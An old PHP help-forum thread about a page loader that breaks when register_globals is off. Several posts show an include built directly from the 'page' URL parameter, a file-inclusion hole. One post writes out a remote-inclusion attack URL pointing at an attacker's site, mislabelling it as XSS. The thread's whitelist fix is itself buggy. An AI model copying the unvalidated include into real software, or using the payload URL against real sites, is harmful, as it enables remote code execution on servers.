Results 1 to 18 of 18
  1. #1

    Surprise php error

    I have been using just a simple line of PHP for my web content and layouts on my websites. The code is a simple phrase of:

    <?php include("$page.txt"); ?>
    It has worked perfectly fine until today and i just made my links for example:

    websiteblahblah.com/main.php?page=home
    to load in the home.txt file inside of the page. It is a simple script that has worked for me for years. Today i began looking at one of my websites and i noticed an error loading all the pages. So i checked out my others and that script no longer works on any of my websites. The error i get is:

    Warning: main(.txt): failed to open stream: No such file or directory in /home/stratic/public_html/bt/main.php on line 218

    Warning: main(.txt): failed to open stream: No such file or directory in /home/stratic/public_html/bt/main.php on line 218

    Warning: main(): Failed opening '.txt' for inclusion (include_path='.:/usr/lib/php:/usr/local/lib/php') in /home/stratic/public_html/bt/main.php on line 218
    So now i'm not sure what to do. I havn't messed with the code on most of these sites in months and yet they just quit working. If you have any ideas or anything that might help me i would greatly appreciate it. Thanks

  2. #2
    Join Date
    Feb 2003
    Location
    Connecticut
    Posts
    5,441
    It sounds like REGISTER_GLOBALS is off.

    The workaround is:

    PHP Code:
    <?php include $_GET['page'].'.txt'?>

  3. #3
    I have a few other scripts in the page that work off of that variable, but now they aren't working properly. The script just shows regular pictures and not a different one when you are on that page. Here is the full code of it. It is a script that switched the images out according to what page content they are on.

    <?php
    if ($page == home) {
    print '<img src="home2.jpg" border="0"><br>';
    }
    if ($page != home) {
    print '<a href="main.php?page=home"><img src="home.jpg" border="0"></a><br>';
    }
    ?>
    <?php
    if ($page == trailers && $sub != t) {
    print '<img src="trailers2.jpg" border="0"><br>';
    }
    if ($sub == t) {
    print '<a href="main.php?page=trailers"><img src="trailers2.jpg" border="0"></a><br>';
    }
    if ($page != trailers && $sub != t) {
    print '<a href="main.php?page=trailers"><img src="trailers.jpg" border="0"></a><br>';
    }
    ?>
    <?php
    if ($page == parts && $sub != p) {
    print '<img src="parts2.jpg" border="0"><br>';
    }
    if ($sub == p) {
    print '<a href="main.php?page=parts"><img src="parts2.jpg" border="0"></a><br>';
    }
    if ($page != parts && $sub != p) {
    print '<a href="main.php?page=parts"><img src="parts.jpg" border="0"></a><br>';
    }
    ?>
    <?php
    if ($page == directions) {
    print '<img src="directions2.jpg" border="0"><br>';
    }
    if ($page != directions) {
    print '<a href="main.php?page=directions"><img src="directions.jpg" border="0"></a><br>';
    }
    ?>
    <?php
    if ($page == contact) {
    print '<img src="contact2.jpg" border="0"><br>';
    }
    if ($page != contact) {
    print '<a href="main.php?page=contact"><img src="contact.jpg" border="0"></a><br>';
    }
    ?>
    I realize that that is a very lengthy script for what i want to do, so if anyone else has any ideas that would make this script easier and not so many processes please let me know. Thanks for the help everyone.

  4. #4
    Join Date
    Feb 2003
    Location
    Connecticut
    Posts
    5,441
    Just add
    PHP Code:
    $page $_GET['page']; 
    and you'll be fine.

  5. #5
    Ok great that works. Thank you so much

  6. #6
    Join Date
    Dec 2003
    Location
    Vancouver BC, eh?
    Posts
    570
    You should set up some kind of default:

    $page = (isset($_GET['page'])) ? $_GET['page'] : 'defaultpage';

    or even better create a switch statement so that there are only certain options available, with a default if nothing matches:

    if (isset($_GET['page'])){
    switch ($_GET['page'])
    {
    case 'somepage':
    include 'page/somepage.php';
    break;

    default:
    include 'page/defaultpage.php';

    }
    }

    *edit: had to change something - typed too fast

  7. #7
    I'm still pretty new to PHP so i'm not exactly sure how i would set up the switch statement to do what i need. And what will the default do?

  8. #8
    Join Date
    Dec 2002
    Location
    chica go go
    Posts
    11,858
    you should watch out. Someone could easily execute a xss attack against your page, resulting in possible ddos, or defacement.

    they would just have to access /yourpage.php?page=http://theirsite.com/command

    Then they could setup a file called command.txt on their own website, containing malicious php code, which would be executed on your own machine.

  9. #9
    I see, thanks for letting me know this. Do you know a better way to go about loading in content that would be much safer?

  10. #10
    Join Date
    Dec 2003
    Location
    Vancouver BC, eh?
    Posts
    570
    That is why I mentioned using a switch statement with pre-defined possibilities and also a default one. So first check that the $_GET var does exist and you could use strip_tags() and other methods to clean it up, then using a switch statement check to see if its a valid entry and serve them a default page if it isn't...

  11. #11
    I see, but i can't figure out exactly where i would put the name of each page in that script. So will i put like the home page as a default page so when they try something else it goes there or possibly an error page? Like i said i'm still kinda new at this and I thank you all for your patience and your help.

  12. #12
    Join Date
    Dec 2003
    Location
    Vancouver BC, eh?
    Posts
    570
    http://www.devshed.com/c/a/PHP/PHP-Security-Mistakes/

    This highlights some simple mistakes that everyone should know...

    Depending on how you have your pages setup, but from what I can tell you have your page content "wrapped" in a parsing page.

    So before you wanted to include the page content put in some script that identifies what is being included.

  13. #13
    Ok, I read that file and tried using the script it said. Here's what i came up with:
    $pages = array('home.txt', 'trailers.txt', 'contact.txt', 'directions.txt', 'parts.txt');
    if( in_array($page, $pages) )
    {
    include $_GET['page'].'.txt';
    }
    else
    {
    die("Error");
    }

    Will this work much safer than before and still function exactly the same way?

  14. #14
    Join Date
    Dec 2003
    Location
    Vancouver BC, eh?
    Posts
    570
    That should work fine. I would change the extension of your included pages to .php so they aren't visible outside of the include scope.

  15. #15
    Ok will do. Thanks everyone for the help

  16. #16
    Bah well heres my exact code:

    $sitepages = array('2ball.php', '4flat.php', '7plug.php', 'atv.php', 'breakaway.php', 'contact.php', 'directions.php', 'dovetail.php', 'home.php', 'jack.php', 'license.php', 'main.php', 'parts.php', 'rims.php', 'stack.php', 'stack2.php', 'tilt.php', 'tilt2.php', 'trailers.php', 'utility.php');
    if( in_array($page, $sitepages) )
    {
    include $_GET['page'].'.php';
    }
    else
    {
    die("Page Load Error");
    }

    But i keep getting the page load error. So either my array isn't working right or my include must be messed up.

  17. #17
    Join Date
    Dec 2003
    Location
    Vancouver BC, eh?
    Posts
    570
    $_GET['page'].'.php';

    Using that with your array you are including this:
    2ball.php.php

  18. #18
    Ok, i think i got everything finally going back to normal and now it is much safer than before. Thank you all and now i know exactly where to go when i have problems Thanks again

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •